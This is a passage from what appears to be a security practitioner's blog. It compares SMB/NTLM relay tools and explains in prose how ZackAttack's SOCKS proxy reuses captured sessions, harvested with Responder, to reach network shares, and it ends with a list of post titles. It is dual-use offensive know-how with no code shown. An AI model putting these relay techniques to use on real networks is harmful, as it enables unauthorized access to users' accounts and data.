Now, some would argue that you just spin up the relay at a target then leave it until one pops. I’m not really a fan of that. You will not only be creating multiple access attempt log entries, but you are also just throwing away all of those user authentication attempts. There are 3 tools that agree with me.

Squirtle

Squirtle is awesome plus it’s written in a language I understand (ruby) but it has one serious downfall, many of the post-auth features are left up to the user to develop. It does have a great API but needs some coding to get to do certain things.

Intercepter-NG

I have tested Intercepter-NG out a lot and it has some fantastic features, not to mention that it does relaying on a Windows host, which is impressive all by itself (due to 445 default bind). My only problem with it is that it’s closed source. But definitely recommended.

Zack Attack

The 3rd is a tool called “ZackAttack” by Zack Fasel, you can find it here on Github:ZackAttack. You can find the video of the talk releasing this tool on Youtube. So what is so special about this tool? Other than the fact that most of the web interface is broken horribly it has this amazing bit of code that acts as a SOCKS proxy. This SOCKS proxy identifies SMB or HTTP traffic that has NTLM authentication going on and rewrites it based on captured sessions.

What does this mean? If I use SpiderLab’s Responder, for instance, to spoof/get/fake a bunch of users into connecting to my machine via automatic or forced methods to the capture/keep services that ZackAttack spins up, I can then run smbclient or Outlook or Web browser, push it through the ZackAttack SOCKS proxy, pick a username out of the captured names, and use any password I want when asked, and the SOCKS proxy will automatically replace it en route with the valid session information.

This way I can use every authentication that comes in to its highest potential for pwnage. The video below shows how this can be used to connect to a “Network share”

Update: One thing to mention that ZackAttack does that I haven’t seen other tools do, even Squirtle or Intercepter-NG is getting 3+ successful authentications out of a single relay from a user. ZackAttack does this with some clever HTTP Keep-Alive and SMB “reauth” kung fu.

Other References:

I tried finding all the original/semi original references about SMB (LM/NTLM) Relaying. If you have others please leave a comment below so I can add them to the list.

NoVA Bloggers

Hiding desktop icons for presentations on OSX

Attribution: OPM vs Sony

Domain Controller Machine$ Account To Dump Hashes Notes

Hacking Advice for @krystropolis

Sieges II: The most important cybersecurity conflict classification

Ways To Load Kerberos Tickets

A Strategic Cybersecurity Problem Space Framework

A STRATEGIC CYBERSECURITY PROBLEM SPACE FRAMEWORK

Must Read: The Lafayette Campaign

Get PasswordLastSet time for Domain Controller accounts

Using Domain Controller Account Passwords to HashDump Domains

2015 DerbyCon Hiring

Good Morning Karen. Cool or Scary?

Tres Lessons from Pied Piper Delete Key Hack

The Bake-Off

The Hack

Tres Issues

Tres Lessons

Where Am I? Upcoming Classes, Talks, Presentations

Sieges

Back to Blogger

Are Self-Driving Cars Fatally Flawed?

DevOps Days DC 2015 Talk Video

Almost 600 Miles of Hiking in 365 Days.

Distance Summary

Details

Metasploit + VHOSTS in mass

Top Ten Books Policymakers Should Read on Cyber Security

Effect of Hacking on Stock Price, Or Not?

Mozilla Delphi Project (I took part)

Going Too Far to Prove a Point

Norse Dark Matters: "It's Time to Kill the General Purpose Browser"

The Sad Hard Truth

My Security Strategy: The "Third Way"

My Prediction for Top Gun 2 Plot

XMLCompTable2 - Now with details!

Hearing Witness Doesn't Understand CDM

Calling Shenanigans on all the OPM Breach Hate Threads

Part 1:

Part 2 (Response to a lot of dialogue):

The Tragedy of the Bloomberg Code Issue

Air Force Enlisted Ratings Remain Dysfunctional

Hard to Sprint When You Have Two Broken Legs

Redefining Breach Recovery

My Federal Government Security Crash Program

Continuous Diagnostic Monitoring Does Not Detect Hackers

Introducing Falcon's View Consulting

Answers to Questions from the nVisium SecCasts Panel

Answers on how to get started in Security

The Policy Trap

An Irrelevant Thesis

Lets Call Stunt Hacking What it is, Media Whoring.

What Year Is This?

The Need for Test Data

Will "Guaranteed Security" Save the Digital World?

RSA 2015: Security Mega-Con!

Example of Chinese Military Converging on US Military

Network Security Monitoring Remains Relevant

Please Support OpenNSM Group

RSA Crowdsourced Talks: Yay Judges, Boo Vendors!

Running System Commands Against Multiple SSH Servers with Fabric

Running System Commands Against Multiple SSH Servers With Metasploit

RSA 2015: A Quick Trip

The Attack on GitHub Must Stop

Can Interrogators Teach Digital Security Pros?

DevOoops: Revision Control (git)

Metasploit and MSGRPC

Leaving Gartner, Joining K12

ElasticSearch CVE-2015-1427 RCE Exploit

PowerShell-AD-Recon by PyroTek3

ISTS12 Thoughts, Notes, Feedback, Braindump -- Airport Edition

Effective Cybersecurity Communication: Presentation at Emerald Downs IV, WA

IDS And Security Data Visualization Theory and Practice: A Video

Why Would Iran Welcome Western Tech?

DevOoops: Revision Control (Subversion)

Cybersecurity Framework Class: Theory and Practice (Using NIST and C2M2 as Foils)

Practical Cybersecurity Frameworks Applied to Real World Problems

Running PowerShell Scripts That Require Module Imports With Meterpreter

Powershell dumping all certs in the cert store